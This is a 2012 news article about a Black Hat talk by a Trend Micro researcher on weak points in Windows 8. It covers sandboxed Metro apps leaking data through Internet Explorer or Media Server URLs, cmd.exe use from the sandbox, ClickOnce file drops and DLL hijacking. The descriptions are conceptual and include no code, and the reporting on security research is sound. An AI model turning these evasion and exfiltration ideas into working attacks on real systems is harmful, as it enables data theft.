Researcher Demonstrates Promising Ways to Attack Windows 8

Tim Greene July 30, 2012
Researcher Demonstrates Promising Ways to Attack Windows 8
Windows 8 has soft spots where attackers could apply pressure, researcher says.

Enterprises NeeWindows 8 offers some promising opportunities for attackers, but overall is a much more secure operating system than its predecessor, a researcher told the Black Hat conference.

There are at least three attack points in Windows 8 that with more work might yield vulnerabilities that could be exploited, says Sung-ting Tsai, leader of an advanced threat research team for Trend Micro, who was interviewed for this story after his Black Hat presentation.

But more promising are two methods of evading some security provisions Microsoft has put in place with its new operating system.

The first of these is getting around limitations placed on Windows 8 Metro style applications that prevent them from accessing the Internet. Rather than trying to break through that restriction, an application could instead access an application that has such permission.

So an application that lacks an Internet permission could still send messages to the Internet via Internet Explorer or Microsoft Media Server and append local information to the URL that IE or MMS is instructed to seek, he says. Similarly, a Word or Excel file that the Metro app accesses could contain code to connect the Internet.

With Internet access, a rogue app could upload data from the local machine to a machine on the Internet controlled by an attacker.

Microsoft says it won't do anything about this, according to the company response Tsai includes in his Black Hat presentation. That's because accessing the Internet would be visible to users, who could stop it if they disapproved. Similarly, antivirus products could catch such access. Once this type of activity is reported to Microsoft, it could remove the app from user machines.

Tsai says he disagrees. When the average user sees a Metro app launch MMS, it won't raise suspicion that the application is trying to access the Internet, he says. But even if the user is aware, it is difficult to determine whether the access is normal or malicious behavior. Antivirus software would have similar difficulty telling the difference, he says.

Another possible evasion calls for using the command prompt cmd.exe from within the application container sandbox to trigger other executables outside, Tsai says.

Microsoft says this is not a problem and Tsai agrees. But he says that it is possible that in conjunction with other executables, it could potentially exploit other vulnerabilities.

He also looks at ClickOnce, the installation package running on Windows 8. It is possible to get it to launch files to the file system that could be harmful. Tsai says Microsoft agrees and will fix it in the next release of Windows 8.

Another possible weakness he explored is dll hijacking -- inserting malicious code that is disguised as a dll that an application is looking for. He says Internet Explorer tries to load some dlls that it no longer needs. If the names of such dlls could be found they could be used to disguise malware that the browser would load.